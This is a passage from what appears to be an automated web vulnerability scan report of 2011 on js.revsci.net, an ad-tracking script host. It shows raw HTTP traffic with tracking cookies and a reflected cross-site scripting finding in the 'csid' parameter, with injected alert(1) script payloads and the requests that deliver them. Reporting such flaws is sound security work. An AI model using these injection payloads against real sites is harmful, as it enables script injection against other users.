5xbyIqlIG60UCqagEd7akjIlHqEKgyVPmZRXCZsks8KUgS+ggIDyN3nm8Q9ybV7DYPDsaMVL9l30qTRehQMpViyu4aazqatyngUryJYSDMAw3MoxCYvzLg4VI0yQpDT4YM7EL/sjZF3GBKEvexarBUJ8IhXSEgBy8YPlIb7J1fU36Xok+aMd7hKisl1fiJ5L9WWlvPngVsNahS23h2ilcpGbvT7P8I1H67JHJs0T5zOxlbKA0tgt1XwzumjmY1MFQG7npmmjsejndnQNq6/1ECJ9acOs9TLs4eapvNZQ+7+XrqZbKo7Bg0R+TcmXPDWqHBSsNSRS6PEPs+B0Hn8vC43OULFX/VMEqBD7Um7K4PkKLzZ45EK/e7fMS47h1FG+y0pSm42Y6HkNkhnxCrDjBcgROJzznpsuIbJZQHyXl8j4cUgGiZBxqQSPqhFr9mtghL4GOwp2YKJAlwRxM+bjbCTXIMg2izcge98/uLVSVc1qMa6m03veDkqyKsoaPFeEkA2OOgtvIAoNV11Moc2Q+7bMZeZl4CDzl94tevQyhvCzcZDWHw1CA4qMQBfMOZr4xEG93vu+i9zYjr9xG1HA/txVLLWfK/bAKKmN6fqLbcY2pW5lpqW2FJxi65P63qhCJt0YP0gMlFmQMsihPn4MV2v59cKlKSELXAgqbss7TVL5/B0TuuGU260dpfoFfufumXLCpyIlXH1DRvhprlFYuymPmKAKQrrAUgRzvmuXaEHlH5jRUx1uEFjhqo7hOpqY+eQR+el8zb4xYyA0B3Fjnz5zUZGXZEUOHOUu5GVkR50a/qnzLWhgVLpMsIBeAsDZwR2196JkcyvgVxTSCglY6cvfSw1V+yzCTCmcXLsyRIBE5QZz41zi2x/Bw=="; rsi_us_1000000="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"; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e2e16fd&3&10055,10194,10534&4e07f4c5&1f1a384c105a2f365a2b2d6af5f27c36; rtc_k8KG=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; rsi_segs_1000000=pUP94zmhOXMMH/C1v6FY5BD9CU6duy7ESpLgzGDKYyViGwmWW18bAQsYoAM+8HjFdJtFJWRCiLHBLDbWsPcI86yrtpktmfFacilUsrkfIWWKJiDdQnsDK82st/RBdHlSiCArToI74iBMHEIM6aRZ+ctyPyV2AcskZoa93bnD+7KzmMsYNaQWBrrYkNUezvQnLXGkhVG05Odz4K2YkQ7efGHGdJsOKQEkcQBYjtqaS6H7ZlDNGWHeUbBT+7iWjqkltSlqdFkY5ZCSD/LpMe6oE2LhWxsHk9CQb4f/4DBRvVR+Vsn3Wa2otHHl9DcyWQkxt+HNZk80xAqzN7umu7qJn1io7bu4IlqZWRAwUL/2riYdQyqUN2xVKYYypoVq1rD+CHWBoax0NCsrkHXbllfg48mnErvVtscNhDauRsHqShGST1ntuJP8Y2uTzuL21JyFn9D8BzYJI7XWgqgHY3hwgF1X4Spu79NlxqFyDqacIxYDmgj/c/80HbjalDyO2MjzVEQUdlANyAYn0j8EbYmxQKxsM6Rx3taFnmBYEmerFK8BfqeoKPoaXWO+nwv0ryXCZUva1SDjlo2wVhjQ76dAQ1KhNRC+7n6erq2kuZ1UHS7gGJ+a8IPLnbMauEqtWz/vfr9PAbndBB364psLhQxsNBZ/V+G5/rjrxQ6XCrYppz+AmSwLTlzgnXYOZE+rGQrANefuO3zqAEj7Orx7bW+c7SVq/vKvEfxbwhQK4Bb0D6+TT7bmiEPzBBOMjJtdSmdMA/UlA/1ADQ==; udm_0=MLv3NyEJZjpr3xSpL/sKOUxICxpURCNKVG8JBfsMOWr4c1ruOor8IW57ubLruJ70uAvWzxrBuHPGjOV0Yl999w9PWZEwp6XsRgcj+GkbCgPiYv9OYis//qNYlXaQsRkv1/9n8rbpls3/lg3b/9yLcovhjH8xhVus+bOGmVMfi7o7gawXwNvz26uIS28JGVLlC25P0hSiX8y1K25Ud7EXnL8DDb8pkUWpjvKZpMzKbPpZV94WqnSr172thZ8syzScr9cZG9oqnzD7bqSMJL5BQKcgxSuou8ECw+GXnkdl4OmbY2FbSYlCDRgc+/c6lhFH7jE0YNiubrzPt27J/JEc0Gs+XkI+Ebd1WvYw9/Xd7ftCSDR0Zwe8AhR6iKptca2vjFNTTKo+OkkLJW2FIsLYkAONGVJ9hOmW5e084U7uw0vM+Lhdzw9TqVu5ygVCjUYWXFmCqrrrRk62v1d6cSVtIHFIJ4lePrRIuyqlN2ALWcWNJ2nVPNQCtG6Dh8DEERFi+XoP1wPFhC0GiF7wn0MHND/wCWXx/JWKUU+VC34cUxuUta3r3XuTvx4d+vBQXuDPDnw29QIFptXZW6fOOuymtApEj21aZsv0egu11Apu04LD/roZjbpAC6QGunZcYL9ssZpQjWQYMBZlGqIfgh3iuuWUsPHTBGUDt5cscdNfS7TKpmHXmthcbc/d7e+/MnAdrT/1ZehbDdCHZQeWj6mIfzSpZ8cC3Zk24ZglqRgwNFbilMuOn3DcO2ugB4zdEQcmVaaz6YHh+JNmmLMjl2TA24PK3xD+fbpmhzFvEBjIi7clvv9qOiJtouwDDd2RQYT2Ep3F/HnCv/GaCR4wdJNb6Izjx2OU4EC6SMnmhzRJZx1Mvbeyktq11Zi2w55ZWgZls7Q7wzCg65f8+2GBHdPcBi0xQFO8j756qtOn/3dAStKIMF35glzGEz2NyJbHKXBtkH2X19gpB6ax9rOyGogvW99/utdnqqUGrzn/kEpQnDa2kEUk811wVSbL6q60O/bbCiUNeKz3rRkQPFP8+aD6V0zGLjDPKncsy1hNjN1jRpSMXKxDqVRdpcYwttiPkWREhaInub+YWVtT1oXubfLiNHV9UJeD2k0fkb7r3mvCCEYCbYbJQQbyzKSxCaY/3lu5/BahDewpho2bntF1PV9ZAIHz13i3/QIFqKunfGZergISuHHcpD6S5AkX5oSnOVAymhcRYncJuDVR7w3F5RLVa7EHGecTDqlEvm59ZX8cTQ5bzJ1Abtx13XYb7j1u7zVIfeXneYS+0GlZAi3yogjdpiPiBw1EH7P9o/q1Zg7W9IkgH/YVzge06UUUK4rT1AoMaf8i7WK1YW21srH7XQ0Ot8fltujTte/8QbNhYbI7IG0rOSBbSov47vv3n6MjpPrAf5qhMAXLUGatxFcl4tsfOkACgIvhTn8I6rAXvEYYlNAxsCfXmnI0p8hQiJERchlgDMgmxns4Ly+e/p6PMLWHzPtN5c+q+g+IPQG377uaac8DJzK02AriShlM9dZKDYxgqlG+zJ24k7ffFdBB4+ibuSXB8ld6ZqZ1O9+R2LgBbwAuSwdkT4ftgIBysXBOapY6pYD+cT84SMwsgTEMDgtYrO7hiyO4Q+hxJwlkbjJNzvJXX1Y8JfAsyg8ZWg53ml7FrAz2kysF0CgU8P9ILnou5Ckc6kCRS2UU0ZoeR188Jg==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: udm_0=MLv3NzMJZjpn3tvXt1a8IEVk7uJQc0PnjELcHpdMD+WGJyu9k6ftCfLZsKuuAdTur767GdSvd9OwzMvjeSPhEhMzQ5Xz4eSH8VEDNkRAk8DnVGhb9WRNigcUoVX6wUo821Ha88DKIMATvgWrmYCuFq8DvU62WGy+J0RYKf+Vw+t6J4LHvm32FiJUQ+qGm/zFj6m5exOTnb3eFYj8hUo2P+Dk+wbz+eP/rEjiL1o+s+N4bAPTQFpwjoc/7Ei4hZa2z5yL/in0LdvfZPRdD0ZJx5krSztD72Poe6+51X7IQIioaGGsejxtgVdlH+sGBk5iNmnQPiwCsFTgvEZjHxmGtlEHyjnJ82Xv0I/VcCZvTv+UagiPDNv2AylgDrMNLnFUTfOtEgkV54CDTI61MqRnHiqaWLUrMhKIWOlxran1ExzPvZUEyfHzpCm5uyZGidXdsOnU61K3rWKd3ZSEghOerVJjxUBkcsRMBHziW1UIDv7X4GNwPUgbEnY/xyzWKGRSXTegXUAjhm3ZF5iclt4yGBJiFBcDytNT8Ivxa5m+A0u/yDKQ+4nrHpVSDBWTt7yOIjARVa2hkS739YGK8cX+mcH4ICWp1dEoE1P6Imc2RzP+S0K+SyFyPxiI0NsicxEcTdC52LhdL2pAUPITI5822NU2/0Apn+/r7e8XoLkCU4qQGCVRMU2agnwWKfr1gP7fUC57V54IaUrBDi5XSJscpNPLje6q20zT+0HVFMnnIZf/EmWr2ZfDOAa7Wftemc6TgAWj7T+KcNGjjh3XiPnZgtKw+4kU0grKGfCTaFgXPsjn88flStlrx+JfNfQqMv1OM5gVXCx/3XvhWNjZGjn3cNU/Ecye9RRMCk4v8DM4yDGTkdfyFv8omti7BuwvOQB3hcVd3YfL750yo7ze5CG/Z3HQvZXfS5J/1qTBM1y/p1XO3i+ZUg8UqafvTP0berq1oFOGhKO0HLyYTrAaTYZ3DCIpkHPwTr+I0CxfXmMthewlDpYXJIWdr/ZNXG1amiucEnU30rFpuaSG0sqmy4nIpI94YemjNvDmRoc45HHpOBTP8nIMCleaY6y9cs9jgbka81hERFPARkvT0yTGyhCp58Cq0OSHrMgEoXnByzJlj/meYa5NWovMVY3y+tlsP6TVdCqCL3vSwElybnWpS7xgFMQ5xK9puRMiJJ+kmnfGoem0GM4ctLGSfFsUxO/CCQZ7a8ceFJ28nRFIsetS/2A0KNA954yt8sSfYZi8aQvtQJbVY2i3ckn6PRhH6UpPWNWT/fbQpOjUYK6c3lgGCFLsBwamEizc907+tQMNKvb4MUUaVkH/t/rVFAC5CZQ1pQBa1Au8mHuZvP2Obyt/D5pNwLrRt2R5ybPaapdysUly7PBXXEnH+XsyQVVVs3Z2H6ZqO9CS4wcvDuPslRUoX8Ap5QZXuPZfmUCsfkKgB9nY15zvYlX1JpbUkz51oabXSn5fy7ImmjZFzUeHdrIMJa8N08c6cGUaiidJzqqLhYppR0Weg03j0n2H0DGmykJyLYOYP5mfUll8510kjDAU8Yw33Px2/UyRHwUp6F21K/09fz/qnIY+QS67ePDwuNefGhhal6QVMrfLhDEmMigJoASQMLKlNfXD4TQQYHWN0wDFDUJWQlEEg3tPWEkOk5qfDs6wNyY/BzgarTEmau5/MCSKCG/7gdJ1wsRVqeMBQOXYNWN+wQxOcT1jD1syO5GIfeiZ5rWa5PZSpktx0W7TSBVezi2wqm4Pe0KWS0AWTFhgHJEWEHFJ5UPQRUaV4QyBH8fROaItOpyia9e2PMt6pB7GMbYQ4mFdBC1Rda4q1iJCRgYegdMbAN5ZgZdGI8/3huI51qBSO6X5WXHeZMd0v+g=; Domain=.revsci.net; Expires=Wed, 27-Jun-2012 03:00:57 GMT; Path=/
Last-Modified: Tue, 28 Jun 2011 03:00:57 GMT
Cache-Control: max-age=3600, private
Expires: Tue, 28 Jun 2011 04:00:57 GMT
X-Proc-ms: 1
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Tue, 28 Jun 2011 03:00:57 GMT
Content-Length: 6236

//Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC)
var rsi_now= new Date();
var rsi_csid= 'A10868';if(typeof(csids)=="undefined"){var csids=[rsi_csid];}else{csids.push(rsi_csid);};function rsiClient(Da){
...[SNIP]...
csid);
if(window[rsi_csid])window[rsi_csid].rsi_ral(1);else rsi_ral(1);
if(window[rsi_csid])window[rsi_csid].rsi_r();else rsi_r();
A10868.DM_addEncToLoc('ver', '2.2');
A10868.DM_addEncToLoc('clen','43226dd6';alert(1)//3232e73e367');
A10868.DM_addEncToLoc('vid', '6127792');
A10868.DM_addEncToLoc('pid', '456378');
A10868.DM_addEncToLoc('pli', '2120305');
A10868.DM_addEncToLoc('sid', '1887835');
A10868.DM_addEncToLoc('ali', '3130
...[SNIP]...

1.308. http://js.revsci.net/gateway/gw.js [csid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload 890e0<script>alert(1)</script>c10fc05e5ce was submitted in the csid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gateway/gw.js?csid=H07710890e0<script>alert(1)</script>c10fc05e5ce HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://tech.fortune.cnn.com/2011/01/04/the-secs-challenge-in-the-secondary-market/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e205ae3&9&10024,10124,10066,10080,10076,10085,10133,10143,10152&4dfac4be&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_D05509=82f4957c1a652091&D05509&0&4e22104b&0&&4dfc450c&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_J07717=82f4957c1a652091&J07717&0&4e2422d0&0&&4dfea8b0&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e256477&1&10002&4dfeaccb&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLvvNzMNZjhnHrjq/8xBGTEDYJMzyjPPqEpc6N3o878UDS7ekFMZ0NQVFVYB3OpUUwWT/lTpPPDhAu3HMzQ/N0Zneon5hatIaA/AsAqQQzGUP/a1i6P1OEwoGsCMIlLRuK/NGPucow//mMmCvogsHGU5yqJU7CMt7vnbxTHTfPS12oHBFQLmW9DqJF+zOOS5UtTHuf+C5kvxnyhldBfCRUxhDfaQmRYgR7ppfK2Pf8Kyx2r0lYLWITaKCrr6IrdbmYLokg0G9+h/+v+sjwnt5/gvwGemVnARo6d9GpV+IGfCFNNtSD9g4WDhR3kGsQkaVWu1e3egVbUe4b/cmZNHQj3LBqzTcocLNnBqmkL3ycvPtBX6udKt4c0O7Pl8o3dRU+cwqhETRP0Yvcu9cmiL6oW74KIPoknWY/+lo2hKDiY1o8F5KEF33Wn/97Upq9cm4yD7jLGq976ZEw7Lg6naKOEZZiBHBmEzR8GhQdcg9fhNJ8DYV8KiJA759fwsc8lBi/0nh05XjsHcbziMSGN5s8HLJSLiyHOpXbEMAkLjgIxKYxbp/94dq4G4U39Z4T1g73+A23BlLTJq64obpP4fVlNlYqByAu9Z0SUCt7wpNciJANDl5GrpBEEkZWJhwGl7DS7eEEtwSGLEEzj0ROloiNBYRXxIihFn1h0AyxIfI3XVSgzp4GOqCkNKc6ogGfaB2QGzE9VaFwncSzmaKvsnqArbyzlXvdqDK5rN0BpF8oJ5NpU/7kfGHhit1Hd/A4D15Y6B3YOL6l2f4/gya2vVGJFQmKpc0l0TWLy9zfe7vASjxW181FIBfdJTzu4rj0vcOkcNnt+YoQlM3RCAgE9ZNYbqDUmtj+TuBJ/0IpqD5POoPse2cvqVt8Hh5lxKXeB9hGUXocic2EClAshD59hq/DBsmNyxirCc1GLRVtEZldWY7rzHpngblfYK50KhGezX/6AtyEMGx2jSLo0esObJ6y12qq8v3+IFxpnX+X9oVW3PbqVTQvWS5zHFX09pLwKQxhIjfmwPXzB3tSHK8uQ8KuXYsBnojkTo+YKxKYsnrC1IcIbcxagrEPQk4/DdFi8C6J67CPULfFOFMm55BO2TsvQY8UcTZfiVsHLP7bCLlJTaQbzuvCO+Vl2q+EMTY0u5V17OndOIteJCZIMjCT8N6/fTr+8V6ODG2zy5QBY18ef3kg0g+eT3SZqHGv3txamtal/0htoFQsTsyVV1DtJ9wUnL1YnNoQT1M9moQ1KiWJHGBwc7BmeM0egx7xl8dYCmjF/+06Win/g6374teZiXyQRwFI8vbRxn431hPEBMQf1/GPY3SWL6EsZI9UCA87JucbRJh+HWm1cENJvz9In26LFQbzILdM8cpl6HtUzw1ZnYHZKRmrUdEKFY6/7jahi5QV+8vSdbLwHOsVb1hc9n5JM5WM1sgaqprPBGbV3OEvjTaOqB9N4TuVgnVXgi214p5oY7PCOL17I1CLGU+zvM6+6iN3c0hzRAHT5IALyyWucCbAdjy8YPhquPAoPmwWGwn2Vyp3mv3c1mGuzo6zSAT3UikW1xCBKSiLMiB5azg69WOTLqOzputMjpmpuvN19e+uclMRmaajH2b+Rm0mTAVzzv5S2fDH1w2TZAKFQtZ/9tEHunLIMLDnRYH2UBn9T5acy7cHkN/iksNldq7+9ScxK7HJVj9m3hE3CL6Q1bzXp6y6Rxh5AaA93zw3/dyDIan4+ZLcbtQyaFC+MHO4T8zifrwa9JYzXOrjE/aJnJPmahXszJNYzEORXkl1RwWJWZjIxiOxvLZQ==; rsi_segs_1000000=pUPF40lBunIMH/AtZKgq+hOCsvh2r1cRXp0RGUGSYcZyD+IWG3EHkQdQr8iWJc3fpshlxQDIoCvRujzwfi5xTYWkiuQdfgRdrS5CYgSpW7iodnOAAUlAoO2lA6wXFD+rjFH2fzd3pEyKBCGmRmgVKJgALVfezWMSFegwoBDxSNXGWa/Vg/0y6HBU3SgaYrFYehcCuE1D8mtHy56alV7EGVMQOAUJkfaeRGOcOUG5XUMI0Rlun5XPpp6kWVHtj/00zGSOloI2eRDIr0Qcvf6LIzjooFs65gSl9fhTpr7MOHvpI+iTj4zV5W3TredD7mPF3AuxkFRLt6ODngYbg4+9CTxTZTM/VVR4bPqVhW2X6oQ/ndYUqsjOlO3fjpDbwIxebpA7d8PweNqtFKJ313W80R4Jl79Kh5aj4b2inqEfFPIeJAxD7t8XkLz0XPqp/jD5MPu4E2JvGjTMx3A2VgHiMylcdMU81Vb99bgcDZzEOLtwss86afOFonyPIQ0khHDQO7X6Pa1GrhG58VNaUIbFO46bZkdx7J2Ot6sIr145N4pOsA2l0yCZ21x+FqfJmIKGvKoSIjBnvxIClRIhkgr3kPK1iQRNGP/BWnMEZfHjxHMCNJChIGWBU9qNIcbAUqrcY7lwfb8H+En3Kv8l+ZT0zQX252Fe2gYmbS1qT/hoSIFRuGWFXJ9efvubtIw6iMn4K7JxFEJURDaAFDd0ulFenDEKCPoYu2qvdl9M6yCexk659SguSwutbftMW5WtBX5BG2nk/sV4qO+NE948cL1YwkWDKPlmq6zt; rtc_l3iS=MLvf+QU1J7hm54au/lMvA5T5yVBoXnV5ia48QeoLvTaFU7JncECbT7S4QWzy7U2GThJJWJC1X9HyfWlcT0QmZDdd52NNIP+691rmJrMfUJ9xdqvMPeTouAnVOhfkv3bAbrM/ZvioGiNWlJqYpT9biqg2H/EN3rB9r3PtsYhAyBjO/E91RuOE7THb/Ig7DI2J+p749S6U5yHm/vyCyyGLYeKSdro0viqikBP1ggBcLnr70Y0RDxST3ws8+hYG7CuysKjDA6jRoXUrNA1LrPRAuBklsDxodV3lhApMGtUh9X0muEy92vLb/Ro78/MWJHK78nI75UQ0xNBX3xN/1q78Y1lwa7+aWcT2SVhSq1fn9PlFn9JNxgEkh18jS094VU7q9ALnVL5juEV1HDuJEhB7nUWo2mRYf9hydrPIiTTG6QBfk0SU0h2VZnYkPRKAI5OVIJnEdo+QYa1nyGjKb1Q7EmAEDYPj+k1bNxJbo4dCiu2mM3VbRhBjXOPdtasWb+nt33nTIuqWXqyD8u4X8CbTfoI1bQdH8H5mIt1tDvOAmyGIaygBPvhesukGe7KIpYmhN1T3t2b6v